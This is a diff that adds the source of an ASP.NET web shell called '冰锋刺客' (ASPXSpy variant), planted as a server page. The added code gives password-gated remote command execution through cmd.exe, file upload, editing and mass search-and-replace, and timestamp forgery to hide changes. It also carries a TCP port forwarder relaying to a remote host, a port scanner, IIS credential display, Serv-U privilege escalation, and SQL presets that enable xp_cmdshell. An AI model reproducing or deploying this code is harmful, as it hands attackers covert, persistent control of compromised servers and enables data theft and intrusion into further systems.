+LocalPort=lport;
+RemoteAddress=Rip;
+RemotePort=Rport;
+Localaddress=lip;
+rtcpClient=new Socket(AddressFamily.InterNetwork,SocketType.Stream,ProtocolType.Tcp);
+ltcpClient=new Socket(AddressFamily.InterNetwork,SocketType.Stream,ProtocolType.Tcp);
+rtcpClient.BeginConnect(mtJ(RemoteAddress,RemotePort),new AsyncCallback(iiGFO),rtcpClient);
+}
+catch (Exception ex) { }
+}
+protected void iiGFO(IAsyncResult ar)
+{
+try
+{
+session RKXy=new session();
+RKXy.ldel=ltcpClient;
+RKXy.rdel=rtcpClient;
+ltcpClient.BeginConnect(mtJ(Localaddress,LocalPort),new AsyncCallback(VTp),RKXy);
+}
+catch (Exception ex) { }
+}
+protected void VTp(IAsyncResult ar)
+{
+try
+{
+session RKXy=(session)ar.AsyncState;
+ltcpClient.EndConnect(ar);
+RKXy.rdel.BeginReceive(DPrPL,0,DPrPL.Length,SocketFlags.None,new AsyncCallback(LFYM),RKXy);
+RKXy.ldel.BeginReceive(wvZv,0,wvZv.Length,SocketFlags.None,new AsyncCallback(xPS),RKXy);
+}
+catch (Exception ex) { }
+}
+private void LFYM(IAsyncResult ar)
+{
+try
+{
+session RKXy=(session)ar.AsyncState;
+int Ret=RKXy.rdel.EndReceive(ar);
+if (Ret>0)
+ltcpClient.BeginSend(DPrPL,0,Ret,SocketFlags.None,new AsyncCallback(JTcp),RKXy);
+else lyTOK();
+}
+catch (Exception ex) { }
+}
+private void JTcp(IAsyncResult ar)
+{
+try
+{
+session RKXy=(session)ar.AsyncState;
+RKXy.ldel.EndSend(ar);
+RKXy.rdel.BeginReceive(DPrPL,0,DPrPL.Length,SocketFlags.None,new AsyncCallback(this.LFYM),RKXy);
+}
+catch (Exception ex) { }
+}
+private void xPS(IAsyncResult ar)
+{
+try
+{
+session RKXy=(session)ar.AsyncState;
+int Ret=RKXy.ldel.EndReceive(ar);
+if (Ret>0)
+RKXy.rdel.BeginSend(wvZv,0,Ret,SocketFlags.None,new AsyncCallback(IZU),RKXy);
+else lyTOK();
+}
+catch (Exception ex) { }
+}
+private void IZU(IAsyncResult ar)
+{
+try
+{
+session RKXy=(session)ar.AsyncState;
+RKXy.rdel.EndSend(ar);
+RKXy.ldel.BeginReceive(wvZv,0,wvZv.Length,SocketFlags.None,new AsyncCallback(this.xPS),RKXy);
+}
+catch (Exception ex) { }
+}
+public void lyTOK()
+{
+try
+{
+if (ltcpClient!=null)
+{
+ltcpClient.Close();
+}
+if (rtcpClient!=null)
+rtcpClient.Close();
+}
+catch (Exception ex) { }
+}
+}
+protected void vuou()
+{
+PortForward gYP=new PortForward();
+gYP.lyTOK();
+}
+protected void ruQO()
+{
+PortForward gYP=new PortForward();
+gYP.Start(llH.Value,int.Parse(ZHS.Value),eEpm.Value,int.Parse(iXdh.Value));
+}
+public string mRDl(string instr)
+{
+string tmp=null;
+try
+{
+tmp=System.Net.Dns.Resolve(instr).AddressList[0].ToString();
+}
+catch(Exception e)
+{
+}
+return tmp;
+}
+public void VikG()
+{
+string[] OTV=lOmX.Text.ToString().Split(',');
+for(int i=0;i<OTV.Length;i++)
+{
+IVc.Add(new ScanPort(mRDl(MdR.Text.ToString()),Int32.Parse(OTV[i])));
+}
+try
+{
+Thread[] kbXY=new Thread[IVc.Count];
+int sdO=0;
+for(sdO=0;sdO<IVc.Count;sdO++)
+{
+kbXY[sdO]=new Thread(new ThreadStart(((ScanPort)IVc[sdO]).Scan));
+kbXY[sdO].Start();
+}
+for(sdO=0;sdO<kbXY.Length;sdO++)
+kbXY[sdO].Join();
+}
+catch
+{
+}
+}
+public class ScanPort
+{
+private string _ip="";
+private int jTdO=0;
+private TimeSpan _timeSpent;
+private string QGcH="Not scanned";
+public string ip
+{
+get { return _ip;}
+}
+public int port
+{
+get { return jTdO;}
+}
+public string status
+{
+get { return QGcH;}
+}
+public TimeSpan timeSpent
+{
+get { return _timeSpent;}
+}
+public ScanPort(string ip,int port)
+{
+_ip=ip;
+jTdO=port;
+}
+public void Scan()
+{
+TcpClient iYap=new TcpClient();
+DateTime qYZT=DateTime.Now;
+try
+{
+iYap.Connect(_ip,jTdO);
+iYap.Close();
+QGcH="<font color=green><b>Open</b></font>";
+}
+catch
+{
+QGcH="<font color=red><b>Close</b></font>";
+}
+_timeSpent=DateTime.Now.Subtract(qYZT);
+}
+}
+public static void YFcNP(System.Web.UI.Page page)
+{
+page.RegisterHiddenField("__EVENTTARGET","");
+page.RegisterHiddenField("__FILE","");
+string s=@"<script language=Javascript>";
+s+=@"function Bin_PostBack(eventTarget,eventArgument)";
+s+=@"{";
+s+=@"var theform=document.forms[0];";
+s+=@"theform.__EVENTTARGET.value=eventTarget;";
+s+=@"theform.__FILE.value=eventArgument;";
+s+=@"theform.submit();";
+s+=@"} ";
+s+=@"</scr"+"ipt>";
+page.RegisterStartupScript("",s);
+}
+protected void PPtK(object sender,EventArgs e)
+{
+WICxe();
+yhv.Visible=true;
+Bin_H2_Title.InnerText="文件搜索 >>";
+NaLJ.Value=Request.PhysicalApplicationPath;
+oJiym.Visible=false;
+}
+protected void NBy(object sender,EventArgs e)
+{
+DirectoryInfo GQMM=new DirectoryInfo(NaLJ.Value);
+if(!GQMM.Exists)
+{
+xseuB("Path invalid ! ");
+return;
+}
+oog(GQMM);
+xseuB("Search completed ! ");
+}
+public void oog(DirectoryInfo dir)
+{
+try
+{
+oJiym.Visible=true;
+foreach(FileInfo Bin_Files in dir.GetFiles())
+{
+try
+{
+if(Bin_Files.FullName==Request.PhysicalPath)
+{
+continue;
+}
+if(!Regex.IsMatch(Bin_Files.Extension.Replace(".",""),"^("+UDLvA.Value+")$",RegexOptions.IgnoreCase))
+{
+continue;
+}
+if(Ven.SelectedItem.Value=="name")
+{
+if(rAQ.Checked)
+{
+if(Regex.IsMatch(Bin_Files.Name,iaMKl.Value,RegexOptions.IgnoreCase))
+{
+FJvQ(Bin_Files);
+}
+}
+else
+{
+if(Bin_Files.Name.ToLower().IndexOf(iaMKl.Value.ToLower())!=-1)
+{
+Response.Write(Bin_Files.FullName);
+FJvQ(Bin_Files);
+}
+}
+}
+else
+{
+StreamReader sr=new StreamReader(Bin_Files.FullName,Encoding.Default);
+string ava=sr.ReadToEnd();
+sr.Close();
+if(rAQ.Checked)
+{
+if(Regex.IsMatch(ava,iaMKl.Value,RegexOptions.IgnoreCase))
+{
+FJvQ(Bin_Files);
+if(YZw.Checked)
+{
+ava=Regex.Replace(ava,iaMKl.Value,qPe.Value,RegexOptions.IgnoreCase);
+StreamWriter sw=new StreamWriter(Bin_Files.FullName,false,Encoding.Default);
+sw.Write(ava);
+sw.Close();
+}
+}
+}
+else
+{
+if(ava.ToLower().IndexOf(iaMKl.Value.ToLower())!=-1)
+{
+FJvQ(Bin_Files);
+if(YZw.Checked)
+{
+ava=Strings.Replace(ava,iaMKl.Value,qPe.Value,1,-1,CompareMethod.Text);
+StreamWriter sw=new StreamWriter(Bin_Files.FullName,false,Encoding.Default);
+sw.Write(ava);
+sw.Close();
+}
+}
+}
+}
+}
+catch(Exception ex)
+{
+xseuB(ex.Message);
+continue;
+}
+}
+foreach(DirectoryInfo subdir in dir.GetDirectories())
+{
+oog(subdir);
+}
+}
+catch(Exception ex)
+{
+xseuB(ex.Message);
+}
+}
+public void FJvQ(FileInfo objfile)
+{
+TableRow tr=new TableRow();
+TableCell tc=new TableCell();
+string bg=OKM();
+tr.Attributes["onmouseover"]="this.className='focus';";
+tr.CssClass=bg;
+tr.Attributes["onmouseout"]="this.className='"+bg+"';";
+tc.Text="<a href=\"javascript:Bin_PostBack('Bin_Listdir','"+MVVJ(objfile.DirectoryName)+"')\">"+objfile.FullName+"</a>";
+tr.Cells.Add(tc);
+tc=new TableCell();
+tc.Text=objfile.LastWriteTime.ToString();
+tr.Cells.Add(tc);
+tc=new TableCell();
+tc.Text=mTG(objfile.Length);
+tr.Cells.Add(tc);
+oJiym.Rows.Add(tr);
+}
+public void xseuB(string instr)
+{
+jDKt.Visible=true;
+jDKt.InnerText=instr;
+}
+protected void xVm(object sender,EventArgs e)
+{
+string Jfm=FormsAuthentication.HashPasswordForStoringInConfigFile(HRJ.Text,"MD5").ToLower();
+if(Jfm==Password)
+{
+Response.Cookies.Add(new HttpCookie(vbhLn,Password));
+ljtzC.Visible=false;
+PBZw();
+}
+else
+{
+tZSx();
+}
+}
+protected void Ybg(object sender,EventArgs e)
+{
+krIR(Server.MapPath("."));
+}
+protected void KjPi(object sender,EventArgs e)
+{
+Bin_H2_Title.InnerText="IIS探测 >>";
+WICxe();
+VNR.Visible=true;
+AdCx();
+}
+protected void DGCoW(object sender,EventArgs e)
+{
+try
+{
+StreamWriter sw;
+if(NdCX.SelectedItem.Text=="UTF-8")
+{
+sw=new StreamWriter(Sqon.Value,false,Encoding.UTF8);
+}
+else
+{
+sw=new StreamWriter(Sqon.Value,false,Encoding.Default);
+}
+sw.Write(Xgvv.InnerText);
+sw.Close();
+xseuB("Save file success !");
+}
+catch(Exception error)
+{
+xseuB(error.Message);
+}
+krIR(AXSbb.Value);
+}
+protected void lbjLD(object sender,EventArgs e)
+{
+string FlwA=AXSbb.Value;
+FlwA=OElM(FlwA);
+try
+{
+Fhq.PostedFile.SaveAs(FlwA+Path.GetFileName(Fhq.Value));
+xseuB("File upload success!");
+}
+catch(Exception error)
+{
+xseuB(error.Message);
+}
+krIR(AXSbb.Value);
+}
+protected void EXV(object sender,EventArgs e)
+{
+krIR(AXSbb.Value);
+}
+protected void mcCY(object sender,EventArgs e)
+{
+krIR(Server.MapPath("."));
+}
+protected void iVk(object sender,CommandEventArgs e)
+{
+krIR(e.CommandArgument.ToString());
+}
+protected void XXrLw(object sender,EventArgs e)
+{
+try
+{
+File.SetCreationTimeUtc(QiFB.Value,File.GetCreationTimeUtc(lICp.Value));
+File.SetLastAccessTimeUtc(QiFB.Value,File.GetLastAccessTimeUtc(lICp.Value));
+File.SetLastWriteTimeUtc(QiFB.Value,File.GetLastWriteTimeUtc(lICp.Value));
+xseuB("File time clone success!");
+}
+catch(Exception error)
+{
+xseuB(error.Message);
+}
+krIR(AXSbb.Value);
+}
+protected void tIykC(object sender,EventArgs e)
+{
+string path=pWVL.Value;
+try
+{
+File.SetAttributes(path,FileAttributes.Normal);
+if(ZhWSK.Checked)
+{
+File.SetAttributes(path,FileAttributes.ReadOnly);
+}
+if(SsR.Checked)
+{
+File.SetAttributes(path,File.GetAttributes(path)| FileAttributes.System);
+}
+if(ccB.Checked)
+{
+File.SetAttributes(path,File.GetAttributes(path)| FileAttributes.Hidden);
+}
+if(fbyZ.Checked)
+{
+File.SetAttributes(path,File.GetAttributes(path)| FileAttributes.Archive);
+}
+File.SetCreationTimeUtc(path,Convert.ToDateTime(yUqx.Value));
+File.SetLastAccessTimeUtc(path,Convert.ToDateTime(aLsn.Value));
+File.SetLastWriteTimeUtc(path,Convert.ToDateTime(uYjw.Value));
+xseuB("File attributes modify success!");
+}
+catch(Exception error)
+{
+xseuB(error.Message);
+}
+krIR(AXSbb.Value);
+}
+protected void VOxn(object sender,EventArgs e)
+{
+WICxe();
+vIac.Visible=true;
+Bin_H2_Title.InnerText="执行命令>>";
+}
+protected void FbhN(object sender,EventArgs e)
+{
+try
+{
+Process ahAE=new Process();
+ahAE.StartInfo.FileName=kusi.Value;
+ahAE.StartInfo.Arguments=bkcm.Value;
+ahAE.StartInfo.UseShellExecute=false;
+ahAE.StartInfo.RedirectStandardInput=true;
+ahAE.StartInfo.RedirectStandardOutput=true;
+ahAE.StartInfo.RedirectStandardError=true;
+ahAE.Start();
+string Uoc=ahAE.StandardOutput.ReadToEnd();
+Uoc=Uoc.Replace("<","&lt;");
+Uoc=Uoc.Replace(">","&gt;");
+Uoc=Uoc.Replace("\r\n","<br>");
+tnQRF.Visible=true;
+tnQRF.InnerHtml="<hr width=\"100%\" noshade/><pre>"+Uoc+"</pre>";
+}
+catch(Exception error)
+{
+xseuB(error.Message);
+}
+}
+protected void RAFL(object sender,EventArgs e)
+{
+if(qPdI.Text.Length>0)
+{
+tpRQ(qPdI.Text);
+}
+else
+{
+lFAvw();
+}
+}
+protected void Grxk(object sender,EventArgs e)
+{
+YUw();
+}
+protected void ilC(object sender,EventArgs e)
+{
+tZRH();
+}
+protected void HtB(object sender,EventArgs e)
+{
+pDVM();
+}
+protected void Olm(object sender,EventArgs e)
+{
+iLVUT();
+}
+protected void jXhS(object sender,EventArgs e)
+{
+ADCpk();
+}
+protected void lRfRj(object sender,EventArgs e)
+{
+lDODR();
+}
+protected void xSy(object sender,EventArgs e)
+{
+xFhz();
+}
+protected void dMx(object sender,EventArgs e)
+{
+rAhe();
+}
+protected void zOVO(object sender,EventArgs e)
+{
+if(((DropDownList)sender).ID.ToString()=="WYmo")
+{
+dQIIF.Visible=false;
+MasR.Text=WYmo.SelectedItem.Value.ToString();
+}
+if(((DropDownList)sender).ID.ToString()=="Pvf")
+{
+xTZY();
+}
+if(((DropDownList)sender).ID.ToString()=="FGEy")
+{
+jHIy.InnerText=FGEy.SelectedItem.Value.ToString();
+}
+if(((DropDownList)sender).ID.ToString()=="NdCX")
+{
+gLKc(Sqon.Value);
+}
+}
+protected void IkkO(object sender,EventArgs e)
+{
+krIR(AXSbb.Value);
+}
+protected void BGY(object sender,EventArgs e)
+{
+vCf();
+}
+protected void cptS(object sender,EventArgs e)
+{
+vNCHZ();
+}
+protected void fDO(object sender,EventArgs e)
+{
+MHLv();
+}
+protected void vJNsE(object sender,EventArgs e)
+{
+vuou();
+xseuB("Clear All Thread ......");
+}
+protected void wDZ(object sender,EventArgs e)
+{
+if(iXdh.Value=="" || eEpm.Value.Length<7 || ZHS.Value=="")return;
+ruQO();
+xseuB("All Thread Start ......");
+}
+protected void tYoZ(object sender,EventArgs e)
+{
+}
+protected void ELkQ(object sender,EventArgs e)
+{
+VikG();
+GBYT.Visible=true;
+string res=string.Empty;
+foreach(ScanPort th in IVc)
+{
+res+=th.ip+" : "+th.port+" ................................. "+th.status+"<br>";
+}
+GBYT.InnerHtml=res;
+}
+protected void ORUgV(object sender,EventArgs e)
+{
+dwgT();
+}
+public void WICxe()
+{
+DCbS.Visible=false;
+CzfO.Visible=false;
+APl.Visible=false;
+vIac.Visible=false;
+kkHN.Visible=false;
+YwLB.Visible=false;
+iDgmL.Visible=false;
+hOWTm.Visible=false;
+vrFA.Visible=false;
+yhv.Visible=false;
+}
+</script>
+<html xmlns="http://www.w3.org/1999/xhtml" >
+<head id="Head1" runat="server">
+<meta http-equiv="Content-Type" content="text/html;charset=utf-8"/>
+<title>冰锋刺客</title>
+<style type="text/css">
+.Bin_Style_Login{font-size: 12px; font-family:Tahoma;background-color:#ddd;border:1px solid #fff;}
+body,td{font: 12px Tahoma,Arial;line-height: 16px; background-color:#003300; color:lime;}
+.input{font-size: 12px;background-color:#ddd;border:1px solid #fff;}
+.list{font-size: 12px;background-color:#ddd;border:1px solid #fff;}
+.area{font-size: 12px;background-color:#ddd;border:1px solid #fff;padding:2px;}
+.bt {font-size: 12px;background-color:#ddd;border:1px solid #fff;}
+a {color:lime;text-decoration: none;}a:hover{color:lime;}
+.alt1 td{border-top:1px solid #fff;border-bottom:1px solid #ddd;background:#003300;padding:5px 10px 5px 5px;}
+.alt2 td{border-top:1px solid #fff;border-bottom:1px solid #ddd;background:#003300;padding:5px 10px 5px 5px;}
+.focus td{border-top:1px solid #fff;border-bottom:1px solid #ddd;background:#015201;padding:5px 10px 5px 5px;}
+.head td{border-top:1px solid #ddd;border-bottom:1px solid #ccc;background:#073b07;padding:5px 10px 5px 5px;font-weight:bold;}
+.head td span{font-weight:normal;}
+form{margin:0;padding:0;}
+h2{margin:0;padding:0;height:24px;line-height:24px;font-size:14px;color:lime;}
+ul.info li{margin:0;color:lime;line-height:24px;height:24px;}
+u{text-decoration: none;color:lime;float:left;display:block;width:150px;margin-right:10px;}
+.u1{text-decoration: none;color:lime;float:left;display:block;width:150px;margin-right:10px;}
+.u2{text-decoration: none;color:lime;float:left;display:block;width:350px;margin-right:10px;}
+</style>
+<script type="text/javascript">
+function CheckAll(form){
+for(var i=0;i<form.elements.length;i++){
+var e=form.elements[i];
+if(e.name!='chkall')
+e.checked=form.chkall.checked;
+}
+}
+</script>
+</head>
+<body style="margin:0;table-layout:fixed;">
+<form id="ASPXSpy" runat="server">
+<div id="ljtzC" runat="server" style=" margin:15px" enableviewstate="false" visible="false" >
+<span style="font:11px Verdana;">Password:</span>
+<asp:TextBox ID="HRJ" runat="server" Columns="20" CssClass="Bin_Style_Login" ></asp:TextBox>
+<asp:Button ID="ZSnXu" runat="server" Text="Login" CssClass="Bin_Style_Login" OnClick="xVm"/><p/>
+</div>
+<div id="ZVS" runat="server">
+<div id="Zzj" runat="server">
+<table width="100%" border="0" cellpadding="0" cellspacing="0">
+<tr class="head">
+<td ><span style="float:right;"><a href="http://www.nftsafe.com" target="_blank">☆NFT小组</a></span><span id="Bin_Span_Sname" runat="server" enableviewstate="true"></span></td>
+</tr>
+<tr class="alt1">
+<td><span style="float:right;" id="Bin_Span_FrameVersion" runat="server"></span>
+<asp:LinkButton ID="UtkN" runat="server" OnClick="YKpI" Text="退出登录" ></asp:LinkButton> | <asp:LinkButton ID="RsqhW" runat="server" Text="文件(夹)管理" OnClick="Ybg"></asp:LinkButton> | <asp:LinkButton ID="xxzE" runat="server" Text="Cmd命令" OnClick="VOxn"></asp:LinkButton> | <asp:LinkButton ID="nuc" runat="server" Text="IIS探测" OnClick="KjPi"></asp:LinkButton> | <asp:LinkButton ID="OREpx" runat="server" Text="系统进程" OnClick="Grxk"></asp:LinkButton> | <asp:LinkButton ID="jHN" runat="server" Text="系统服务" OnClick="ilC"></asp:LinkButton> | <asp:LinkButton ID="PHq" runat="server" Text="用户(组)信息" OnClick="Olm"></asp:LinkButton> | <asp:LinkButton ID="wmgnK" runat="server" Text="系统信息" OnClick="HtB"></asp:LinkButton> | <asp:LinkButton ID="FeV" runat="server" Text="文件搜索" OnClick="PPtK"></asp:LinkButton> | <asp:LinkButton ID="PVQ" runat="server" Text="Serv-U提权" OnClick="jXhS"></asp:LinkButton> | <asp:LinkButton ID="jNDb" runat="server" Text="注册表查询" OnClick="xSy"></asp:LinkButton> | <asp:LinkButton ID="HDQ" runat="server" Text="端口扫描" OnClick="cptS" ></asp:LinkButton> | <asp:LinkButton ID="AoI" runat="server" Text="数据库管理" OnClick="dMx"></asp:LinkButton> | <asp:LinkButton ID="KHbEd" runat="server" Text="端口映射" OnClick="fDO"></asp:LinkButton>
+</td>
+</tr>
+</table>
+</div>
+<table width="100%" border="0" cellpadding="15" cellspacing="0"><tr><td>
+<div id="jDKt" style="background:#f1f1f1;border:1px solid #ddd;padding:15px;font:14px;text-align:center;font-weight:bold;" runat="server" visible="false" enableviewstate="false"></div>
+<h2 id="Bin_H2_Title" runat="server"></h2>
+<%--FileList--%>
+<div id="CzfO" runat="server">
+<table width="100%" border="0" cellpadding="0" cellspacing="0" style="margin:10px 0;">
+ <tr>
+<td style=" white-space:nowrap">当前目录 : </td>
+<td style=" width:100%"><input class="input" id="AXSbb" type="text" style="width:97%;margin:0 8px;" runat="server"/>
+</td>
+<td style="white-space:nowrap" ><asp:Button ID="xaGwl" runat="server" Text="Go" CssClass="bt" OnClick="EXV"/></td>
+ </tr>
+</table>
+<table width="100%" border="0" cellpadding="4" cellspacing="0">
+<tr class="alt1"><td colspan="7" style="padding:5px;">
+<div style="float:right;"><input id="Fhq" class="input" runat="server" type="file" style=" height:22px"/>
+<asp:Button ID="RvPp" CssClass="bt" runat="server" Text="上传" OnClick="lbjLD"/></div><asp:LinkButton ID="OLJFp" runat="server" Text="网站目录" OnClick="mcCY"></asp:LinkButton> | <a href="#" id="Bin_Button_CreateDir" runat="server">木马目录</a> | <a href="#" id="Bin_Button_CreateFile" runat="server">新建目录</a>
+ | <span id="Bin_Span_Drv" runat="server"></span><a href="#" id="Bin_Button_KillMe" runat="server" style="color:Red">木马自杀</a>
+</td></tr>
+<asp:Table ID="UGzP" runat="server" Width="100%" CellSpacing="0" >
+<asp:TableRow CssClass="head"><asp:TableCell>&nbsp;</asp:TableCell><asp:TableCell>文件(夹)名</asp:TableCell><asp:TableCell Width="25%">最后修改时间</asp:TableCell><asp:TableCell Width="15%">大小</asp:TableCell><asp:TableCell Width="25%">操作</asp:TableCell></asp:TableRow>
+</asp:Table>
+</table>
+</div>
+<%--FileEdit--%>
+<div id="vrFA" runat="server">
+<p>当前文件（创建新的文件名和新文件）<br/>
+<input class="input" id="Sqon" type="text" size="100" runat="server"/> <asp:DropDownList ID="NdCX" runat="server" CssClass="list" AutoPostBack="true" OnSelectedIndexChanged="zOVO"><asp:ListItem>Default</asp:ListItem><asp:ListItem>UTF-8</asp:ListItem></asp:DropDownList>
+</p>
+<p>文件内容<br/>
+<textarea id="Xgvv" runat="server" class="area" cols="100" rows="25" enableviewstate="true" ></textarea>
+</p>
+<p><asp:Button ID="JJjbW" runat="server" Text="提交" CssClass="bt" OnClick="DGCoW"/> <asp:Button ID="iCNu" runat="server" Text="返回" CssClass="bt" OnClick="IkkO"/></p>
+</div>
+<%--CloneTime--%>
+<div id="zRyG" runat="server" enableviewstate="false" visible="false">
+<p>修改文件<br/><input class="input" id="QiFB" type="text" size="120" runat="server"/></p>
+<p>参考文件<br/><input class="input" id="lICp" type="text" size="120" runat="server"/></p>
+<p><asp:Button ID="JEaxV" runat="server" Text="提交" CssClass="bt" OnClick="XXrLw"/></p>
+<h2>设置最后修改时间 &raquo;</h2>
+<p>当前文件<br/><input class="input" id="pWVL" type="text" size="120" runat="server"/></p>
+<p>
+<asp:CheckBox ID="ZhWSK" runat="server" Text="只读" EnableViewState="False"/>
+&nbsp;
+<asp:CheckBox ID="SsR" runat="server" Text="系统" EnableViewState="False"/>
+&nbsp;
+<asp:CheckBox ID="ccB" runat="server" Text="隐藏" EnableViewState="False"/>
+&nbsp;
+<asp:CheckBox ID="fbyZ" runat="server" Text="存档" EnableViewState="False"/>
+</p>
+<p>
+创建时间 :
+<input class="input" id="yUqx" type="text" runat="server"/>
+最后修改时间 :
+<input class="input" id="uYjw" type="text" runat="server"/>
+最后访问时间 :
+<input class="input" id="aLsn" type="text" runat="server"/>
+</p>
+<p>
+<asp:Button ID="kOG" CssClass="bt" runat="server" Text="提交" OnClick="tIykC"/>
+</p>
+</div>
+<%--IISSpy--%>
+<div runat="server" id="VNR" visible="false" enableviewstate="false">
+<table width="100%" border="0" cellpadding="4" cellspacing="0" style="margin:10px 0;">
+<asp:Table ID="GlI" runat="server" Width="100%" CellSpacing="0">
+<asp:TableRow CssClass="head"><asp:TableCell>ID</asp:TableCell><asp:TableCell>IIS_USER</asp:TableCell><asp:TableCell>IIS_PASS</asp:TableCell><asp:TableCell>Domain</asp:TableCell><asp:TableCell>Path</asp:TableCell></asp:TableRow>
+</asp:Table>
+</table>
+</div>
+<%--Process--%>
+<div runat="server" id="DCbS" visible="false" enableviewstate="false">
+<table width="100%" border="0" cellpadding="4" cellspacing="0" style="margin:10px 0;">
+<asp:Table ID="IjsL" runat="server" Width="100%" CellSpacing="0" >
+<asp:TableRow CssClass="head"><asp:TableCell></asp:TableCell><asp:TableCell>ID</asp:TableCell><asp:TableCell>Process</asp:TableCell><asp:TableCell>ThreadCount</asp:TableCell><asp:TableCell>Priority</asp:TableCell><asp:TableCell>Action</asp:TableCell></asp:TableRow>
+</asp:Table>
+</table>
+</div>
+<%--CmdShell--%>
+<div runat="server" id="vIac">
+ <p>Cmd路径:<br/>
+ <input class="input" runat="server" id="kusi" type="text" size="100" value="c:\windows\system32\cmd.exe"/>
+ </p>
+ 语句:<br/>
+ <input class="input" runat="server" id="bkcm" value="/c Set" type="text" size="100"/> <asp:Button ID="YrqL" CssClass="bt" runat="server" Text="执行" OnClick="FbhN"/>
+ <div id="tnQRF" runat="server" visible="false" enableviewstate="false">
+ </div>
+</div>
+<%--Services--%>
+<div runat="server" id="iQxm" visible ="false" enableviewstate="false">
+<table width="100%" border="0" cellpadding="4" cellspacing="0" style="margin:10px 0;">
+<asp:Table ID="vHCs" runat="server" Width="100%" CellSpacing="0" >
+<asp:TableRow CssClass="head"><asp:TableCell></asp:TableCell><asp:TableCell>ID</asp:TableCell><asp:TableCell>Name</asp:TableCell><asp:TableCell>Path</asp:TableCell><asp:TableCell>State</asp:TableCell><asp:TableCell>StartMode</asp:TableCell></asp:TableRow>
+</asp:Table>
+</table>
+</div>
+<%--Sysinfo--%>
+<div runat="server" id="ghaB" visible="false" enableviewstate="false">
+<hr style=" border: 1px solid #ddd;height:0px;"/>
+<ul class="info" id="Bin_Ul_Sys" runat="server"></ul>
+<h2 id="Bin_H2_Mac" runat="server"></h2>
+<hr style=" border: 1px solid #ddd;height:0px;"/>
+<ul class="info" id ="Bin_Ul_NetConfig" runat="server"></ul>
+<h2 id="Bin_H2_Driver" runat="server"></h2>
+<hr style=" border: 1px solid #ddd;height:0px;"/>
+<ul class="info" id ="Bin_Ul_Driver" runat="server"></ul>
+</div>
+<%--UserInfo--%>
+<div runat="server" id="xWVQ" visible="false" enableviewstate="false">
+<table width="100%" border="0" cellpadding="4" cellspacing="0" style="margin:10px 0;">
+<asp:Table ID="VPa" runat="server" Width="100%" CellSpacing="0" >
+</asp:Table>
+</table>
+</div>
+<%--SuExp--%>
+ <div runat="server" id="APl">
+<table width="100%" border="0" cellpadding="4" cellspacing="0" style="margin:10px 0;">
+ <tr align="center">
+ <td style="width:10%"></td>
+ <td style="width:20%" align="left">用户名 : <input class="input" runat="server" id="dNohJ" type="text" size="20" value="localadministrator"/></td>
+ <td style="width:20%" align="left">密码 : <input class="input" runat="server" id="NMd" type="text" size="20" value="#l@$ak#.lk;0@P"/></td>
+ <td style="width:20%" align="left">端口 : <input class="input" runat="server" id="HlQl" type="text" size="20" value="43958"/></td>
+ <td style="width:10%"></td>
+ </tr>
+ <tr >
+ <td style="width:10%"></td>
+ <td colspan="5">CmdShell&nbsp;&nbsp;:&nbsp;<input class="input" runat="server" id="mHbjB" type="text" size="100" value="cmd.exe /c net user"/> <asp:Button ID="SPhc" CssClass="bt" runat="server" Text="执行" OnClick="lRfRj"/></td>
+ </tr>
+</table>
+<div id="UHlA" visible="false" enableviewstate="false" runat="server">
+<table width="100%" border="0" cellpadding="4" cellspacing="0" style="margin:10px 0;">
+<tr align="center">
+<td style="width:30%"></td>
+<td align="left" style="width:40%"><pre id="Bin_Td_Res" runat="server"></pre></td>
+<td style="width:30%"></td>
+</tr>
+</table>
+</div>
+</div>
+<%--Reg--%>
+<div id="kkHN" runat="server">
+<p>注册表路径 : <asp:TextBox id="qPdI" style="width:85%;margin:0 8px;" CssClass="input" runat="server"/><asp:Button ID="MoNA" runat="server" Text="Go" CssClass="bt" onclick="RAFL"/></p>
+<table width="100%" border="0" cellpadding="0" cellspacing="0" style="margin:10px 0;">
+<asp:Table ID="pLWD" runat="server" Width="100%" CellSpacing="0" >
+<asp:TableRow CssClass="alt1"><asp:TableCell ColumnSpan="2" id="vyX"></asp:TableCell></asp:TableRow>
+<asp:TableRow CssClass="head"><asp:TableCell Width="40%">Key</asp:TableCell><asp:TableCell Width="60%">Value</asp:TableCell></asp:TableRow>
+</asp:Table>
+</table>
+</div>
+<%--PortScan--%>
+<div id="YwLB" runat="server">
+<p>
+IP : <asp:TextBox id="MdR" style="width:10%;margin:0 8px;" CssClass="input" runat="server" Text="127.0.0.1"/> 端口 : <asp:TextBox id="lOmX" style="width:40%;margin:0 8px;" CssClass="input" runat="server" Text="21,25,80,110,1433,1723,3306,3389,4899,5631,43958,65500"/> <asp:Button ID="CmUCh" runat="server" Text="扫描" CssClass="bt" OnClick="ELkQ"/>
+</p>
+<div id="GBYT" runat="server" visible="false" enableviewstate="false"></div>
+</div>
+<%--DataBase--%>
+<div id="iDgmL" runat="server">
+<p>语句 : <asp:TextBox id="MasR" style="width:70%;margin:0 8px;" CssClass="input" runat="server"/><asp:DropDownList runat="server" CssClass="list" ID="WYmo" AutoPostBack="True" OnSelectedIndexChanged="zOVO" ><asp:ListItem></asp:ListItem><asp:ListItem Value="server=localhost;UID=sa;PWD=;database=master;Provider=SQLOLEDB">MSSQL</asp:ListItem><asp:ListItem Value="Provider=Microsoft.Jet.OLEDB.4.0;Data Source=E:\database.mdb">ACCESS</asp:ListItem></asp:DropDownList><asp:Button ID="QcZPA" runat="server" Text="Go" CssClass="bt" OnClick="BGY"/></p>
+<div id="dQIIF" runat="server">
+<div id="irTU" runat="server"></div>
+<div id="uXevN" runat="server">
+Please select a database : <asp:DropDownList runat="server" ID="Pvf" AutoPostBack="True" OnSelectedIndexChanged="zOVO" CssClass="list"></asp:DropDownList>
+SQLExec : <asp:DropDownList runat="server" ID="FGEy" AutoPostBack="True" OnSelectedIndexChanged="zOVO" CssClass="list"><asp:ListItem Value="">-- SQL Server Exec --</asp:ListItem><asp:ListItem Value="Use master dbcc addextendedproc('xp_cmdshell','xplog70.dll')">Add xp_cmdshell</asp:ListItem><asp:ListItem Value="Use master dbcc addextendedproc('sp_OACreate','odsole70.dll')">Add sp_oacreate</asp:ListItem><asp:ListItem Value="Exec sp_configure 'show advanced options',1;RECONFIGURE;EXEC sp_configure 'xp_cmdshell',1;RECONFIGURE;">Add xp_cmdshell(SQL2005)</asp:ListItem><asp:ListItem Value="Exec sp_configure 'show advanced options',1;RECONFIGURE;exec sp_configure 'Ole Automation Procedures',1;RECONFIGURE;">Add sp_oacreate(SQL2005)</asp:ListItem><asp:ListItem Value="Exec sp_configure 'show advanced options',1;RECONFIGURE;exec sp_configure 'Web Assistant Procedures',1;RECONFIGURE;">Add makewebtask(SQL2005)</asp:ListItem><asp:ListItem Value="Exec sp_configure 